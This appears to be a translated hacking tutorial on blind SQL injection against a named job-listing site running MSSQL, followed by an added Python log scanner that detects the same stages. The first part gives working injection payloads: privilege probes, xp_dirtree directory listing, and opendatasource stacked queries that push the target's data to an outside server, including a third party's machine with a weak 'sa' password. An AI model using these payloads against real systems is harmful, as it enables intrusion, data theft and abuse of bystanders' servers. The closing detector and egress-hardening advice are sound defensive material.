Mssql blind injection practice

Source: Internet
Author: User

Injection point: http://www.bkjia.com/qiuzhiguwen/job.jsp?num=47075

1. First, determine whether an injection point exists. The manual detection method is not described here.
 
2. Determine the database type. Appending /* tests whether it is MySQL; if appending -- instead returns the normal page, the database should be MSSQL. To confirm: and (select count(*) from sysobjects)>0 -- returns the normal page, so the database is MSSQL.
 
3. Determine the privileges of the injection point. and 1=(select IS_SRVROLEMEMBER(sysadmin))-- tests for sa (sysadmin) privileges; and 1=(select IS_MEMBER(db_owner))-- tests for db_owner privileges. Here both return the normal page, so how do we tell the two apart? My method is to append ;use model-- to the injection point: only a login with sa privileges can switch to the model database, while db_owner cannot, so this distinguishes them. An error is returned, so the injection point has db_owner privileges.
 
4. Injection with db_owner privileges: a LOG backup of course requires listing directories first. Before that, check whether the web server and MSSQL are on the same machine. How?
First run nc -l -p 1433 -vv locally.
 
?num=1;insert%20into%20opendatasource(sqloledb,server=123.131.000.239;uid=et;pwd=34234234234;database=sfsdfsdf).zm.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--
Execute this injection code at the injection point, with NC already listening on port 1433 locally, and check the NC listening window.
Listening on [any] 1433... 122.000.13.68: inverse host lookup failed: h_errno 11004: NO_DATAconnect to [192.168.1.100] from (UNKNOWN) [122.102.13.68] 1972: NO_DATA
Pinging www.XXX.com.cn [122.000.13.68] shows that the database and the web site are on the same IP address.
Now we need to list directories. No tools are needed: this injection point does not display errors, so tools are very slow against it, and I do it by hand. Manual work is not necessarily slower than a tool.
218.26.224.83 sa 123: we need an external MSSQL database server, and this is a machine with a weak password. First connect to it with Query Analyzer to prepare. Create a new database and switch to it.
create table WhyTt_Tmp (subdirectory nvarchar(256) NULL, depth tinyint NULL, [file] bit NULL) creates the table. With the database and table ready, the directory listing can start.
Run this injection code at the injection point first:
;drop table WhyTt_Tmp;create table WhyTt_Tmp (subdirectory nvarchar(256) NULL, depth tinyint NULL, [file] bit NULL);insert WhyTt_Tmp exec master..xp_dirtree d:,1,1--
 
This code creates a table in the target's database and then reads the root directory of drive D into that table.
;insert into opendatasource(sqloledb,server=218.31.149.145;uid=sa;pwd=sa;database=cxd).cxd.dbo.whytt_tmp select * from whytt_tmp--
 
Then execute this code at the injection point. It copies the table contents from the target database into the database we specified; 218.26.224.83 is that database server's IP address.
Open the database on 218.26.224.83 and check whytt_tmp to see the contents of drive C.
Then find the web root directory, and the LOG backup can be done.
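From the defender's side, every stage of the walkthrough above leaves a recognizable trace in the web server's access log: the sysobjects fingerprint, the IS_SRVROLEMEMBER / IS_MEMBER / use model privilege probes, the stacked opendatasource statement that makes the database server connect out to a host of the attacker's choosing, and the xp_dirtree listing. The following is an added example, not code from the original article, that URL-decodes the query string of each request line, flags those stages, and pulls out the outbound host named in an opendatasource connection string so it can be matched against firewall or listener logs. The log lines, client addresses and host 192.0.2.10 are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators for the stages seen in the walkthrough. Each entry is
# (stage label, regex applied to the decoded, lowercased query string).
MSSQL_INDICATORS = [
    ("fingerprint",   re.compile(r"\bfrom\s+sysobjects\b")),
    ("priv-probe",    re.compile(r"\bis_srvrolemember\s*\(|\bis_member\s*\(")),
    ("priv-probe",    re.compile(r";\s*use\s+model\b")),
    ("oob-exfil",     re.compile(r"\bopendatasource\s*\(|\bopenrowset\s*\(")),
    ("dir-listing",   re.compile(r"\bxp_dirtree\b")),
    ("stacked-query", re.compile(r";\s*(insert|drop|create|exec|use)\b")),
]

# "server=HOST;uid=...;pwd=..." inside an opendatasource() connection string:
# HOST is where the database server would be made to connect.
SERVER_RE = re.compile(r"server\s*=\s*([^;'\"\)]+)")

# Request target from an Apache/IIS-style combined log line (constructed format).
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_query(target: str) -> str:
    """Return the URL-decoded query string, lowercased.
    Decoding twice also catches double-encoded payloads."""
    query = urlsplit(target).query
    return unquote_plus(unquote_plus(query)).lower()


def classify_request(log_line: str):
    """Return a finding dict for a suspicious request, or None if clean."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = decode_query(match.group(1))
    stages = sorted({label for label, rx in MSSQL_INDICATORS if rx.search(query)})
    if not stages:
        return None
    finding = {
        "client": log_line.split(" ", 1)[0],
        "stages": stages,
        "outbound_host": None,
    }
    if "oob-exfil" in stages:
        server = SERVER_RE.search(query)
        if server:
            finding["outbound_host"] = server.group(1).strip()
    return finding


def scan_log(lines):
    """Run the classifier over every line and keep only the hits."""
    return [f for f in (classify_request(line) for line in lines) if f]


# Constructed sample log: one benign request followed by the stages of the attack.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0800] "GET /qiuzhiguwen/job.jsp?num=47075 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:05 +0800] "GET /qiuzhiguwen/job.jsp?num=47075%20and%20(select%20count(*)%20from%20sysobjects)%3E0-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:09 +0800] "GET /qiuzhiguwen/job.jsp?num=47075%20and%201=(select%20is_srvrolemember(%27sysadmin%27))-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:12 +0800] "GET /qiuzhiguwen/job.jsp?num=47075;use%20model-- HTTP/1.1" 500 310',
    '10.0.0.9 - - [01/Jan/2010:10:00:20 +0800] "GET /qiuzhiguwen/job.jsp?num=47075;insert%20into%20opendatasource(%27sqloledb%27,%27server=192.0.2.10;uid=u;pwd=p;database=d%27).d.dbo.t%20select%20name%20from%20master.dbo.sysdatabases-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2010:10:00:30 +0800] "GET /qiuzhiguwen/job.jsp?num=47075;insert%20t%20exec%20master..xp_dirtree%20%27d:%27,1,1-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The outbound_host field is the useful pivot: an opendatasource call only succeeds if the database server is allowed to open TCP 1433 to an arbitrary host, so an egress rule that blocks outbound 1433 from the database server, together with disabling the Ad Hoc Distributed Queries option in sp_configure and running the application's login with less than db_owner, removes the technique the article relies on rather than just detecting it.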
